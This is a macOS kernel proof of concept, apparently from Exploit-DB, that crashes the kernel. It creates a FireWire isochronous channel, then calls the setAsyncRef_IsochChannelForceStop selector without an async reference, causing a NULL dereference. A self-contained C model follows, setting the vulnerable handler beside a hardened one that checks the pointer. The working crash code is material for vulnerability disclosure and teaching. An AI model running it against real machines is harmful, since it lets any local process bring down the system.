/*
 * IOFireWireFamily-null-deref.c
 * Brandon Azad
 *
 * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop.
 *
 * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip
 */
#include <IOKit/IOKitLib.h>

int main() {
	int ret = 0;

	/* Locate the local FireWire node; its user client is IOFireWireUserClient. */
	io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
			IOServiceMatching("IOFireWireLocalNode"));
	if (service == IO_OBJECT_NULL) {
		ret = 1;
		goto fail1;
	}

	/* Open a connection (user client type 0) and drop the service reference. */
	io_connect_t connect;
	kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
	IOObjectRelease(service);
	if (kr != KERN_SUCCESS) {
		ret = 2;
		goto fail1;
	}

	/* isochChannel_Create (selector 57): returns a user-object handle for the
	 * new isochronous channel in the single scalar output. */
	uint64_t args[3] = { 0, 0x100, 0x100 };
	uint64_t handle = 0;
	uint32_t output_count = 1;
	kr = IOConnectCallMethod(connect, 57,
			args, sizeof(args) / sizeof(*args), NULL, 0,
			&handle, &output_count, NULL, NULL);
	if (kr != KERN_SUCCESS) {
		ret = 3;
		goto fail2;
	}

	/* setAsyncRef_IsochChannelForceStop (selector 90), passed the channel handle.
	 * This is a synchronous IOConnectCallMethod, so no async reference accompanies
	 * the request; the kernel dereferences NULL and panics here. */
	kr = IOConnectCallMethod(connect, 90,
			&handle, 1, NULL, 0,
			NULL, NULL, NULL, NULL);
	if (kr != KERN_SUCCESS) {
		ret = 4;
		goto fail2;
	}

fail2:
	IOServiceClose(connect);
fail1:
	return ret;
}
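The PoC's second call is a plain IOConnectCallMethod rather than IOConnectCallAsyncMethod, so the kernel side receives no async reference. The following is an added, self-contained C model of that bug class and of the check that closes it; it is not Apple's IOFireWireFamily source and not part of the original PoC. The struct names, the assumption that IOUserClient hands a synchronous caller a NULL asyncReference with a zero count, and the treatment of that pointer as the one setAsyncRef_IsochChannelForceStop dereferences are all modelling assumptions; only the kIOReturn values are the real IOKit constants.

```c
/*
 * Added model of a user-client external method that assumes it was invoked
 * asynchronously. Not Apple's code; the structures are a simplified stand-in
 * for IOKit's IOExternalMethodArguments (assumption).
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef uint32_t IOReturn_t;                  /* modelled IOReturn */
#define kIOReturnSuccess      0x00000000u     /* real IOKit value */
#define kIOReturnBadArgument  0xe00002c2u     /* real IOKit value */
#define kOSAsyncRef64Count    8               /* OSAsyncReference64 holds 8 words */

typedef uint64_t io_user_reference_t;

/* Simplified stand-in for IOExternalMethodArguments: only the fields used here. */
typedef struct {
    io_user_reference_t *asyncReference;      /* NULL when invoked synchronously (assumption) */
    uint32_t             asyncReferenceCount;
    const uint64_t      *scalarInput;
    uint32_t             scalarInputCount;
} ExternalMethodArgs;

/* Stand-in for the per-channel kernel object that stores the user's async ref. */
typedef struct {
    uint64_t            handle;
    io_user_reference_t userAsyncRef[kOSAsyncRef64Count];
    int                 asyncRefSet;
} IsochChannel;

/* Vulnerable shape: looks up the channel, then trusts asyncReference. */
IOReturn_t vulnerable_setAsyncRef_ForceStop(IsochChannel *ch, const ExternalMethodArgs *args)
{
    if (args->scalarInputCount < 1 || args->scalarInput[0] != ch->handle)
        return kIOReturnBadArgument;
    /* BUG: asyncReference is NULL for IOConnectCallMethod callers -> NULL deref. */
    memcpy(ch->userAsyncRef, args->asyncReference, sizeof(ch->userAsyncRef));
    ch->asyncRefSet = 1;
    return kIOReturnSuccess;
}

/* Hardened shape: reject a synchronous invocation before touching the pointer. */
IOReturn_t hardened_setAsyncRef_ForceStop(IsochChannel *ch, const ExternalMethodArgs *args)
{
    if (args->scalarInputCount < 1 || args->scalarInput[0] != ch->handle)
        return kIOReturnBadArgument;
    if (args->asyncReference == NULL || args->asyncReferenceCount < kOSAsyncRef64Count)
        return kIOReturnBadArgument;   /* caller used the synchronous entry point */
    memcpy(ch->userAsyncRef, args->asyncReference, sizeof(ch->userAsyncRef));
    ch->asyncRefSet = 1;
    return kIOReturnSuccess;
}

/* Models the argument block a synchronous IOConnectCallMethod produces (assumption). */
static ExternalMethodArgs sync_call(const uint64_t *scalars, uint32_t count)
{
    ExternalMethodArgs a = { NULL, 0, scalars, count };
    return a;
}

/* Models the argument block an IOConnectCallAsyncMethod produces (assumption). */
static ExternalMethodArgs async_call(const uint64_t *scalars, uint32_t count,
                                    io_user_reference_t *ref, uint32_t refCount)
{
    ExternalMethodArgs a = { ref, refCount, scalars, count };
    return a;
}

/* Drives the hardened handler exactly as the PoC drives selector 90. */
IOReturn_t hardened_on_sync_call(void)
{
    IsochChannel ch = { .handle = 0x1234 };
    uint64_t scalar = ch.handle;
    ExternalMethodArgs a = sync_call(&scalar, 1);
    return hardened_setAsyncRef_ForceStop(&ch, &a);
}

/* Both handlers behave on the intended async path; returns 1 if both stored the ref. */
int both_ok_on_async_call(void)
{
    IsochChannel v = { .handle = 0x1234 }, h = { .handle = 0x1234 };
    uint64_t scalar = 0x1234;
    io_user_reference_t ref[kOSAsyncRef64Count] = { 0xdead, 0xbeef };   /* constructed */
    ExternalMethodArgs a = async_call(&scalar, 1, ref, kOSAsyncRef64Count);
    return vulnerable_setAsyncRef_ForceStop(&v, &a) == kIOReturnSuccess && v.asyncRefSet
        && hardened_setAsyncRef_ForceStop(&h, &a) == kIOReturnSuccess && h.asyncRefSet
        && h.userAsyncRef[1] == 0xbeef;
}

int main(void)
{
    printf("hardened, synchronous caller: 0x%08x (expect 0xe00002c2)\n", hardened_on_sync_call());
    printf("async path, both handlers: %s\n", both_ok_on_async_call() ? "ok" : "FAIL");
    /* vulnerable_setAsyncRef_ForceStop() is deliberately never given the
     * synchronous block: in this model that is the NULL dereference. */
    return 0;
}
```

The check that matters is the one on asyncReference and asyncReferenceCount before the copy; a kernel external method reachable through both the synchronous and asynchronous IOConnectCall entry points must treat the async reference as optional input, not as something the framework guarantees.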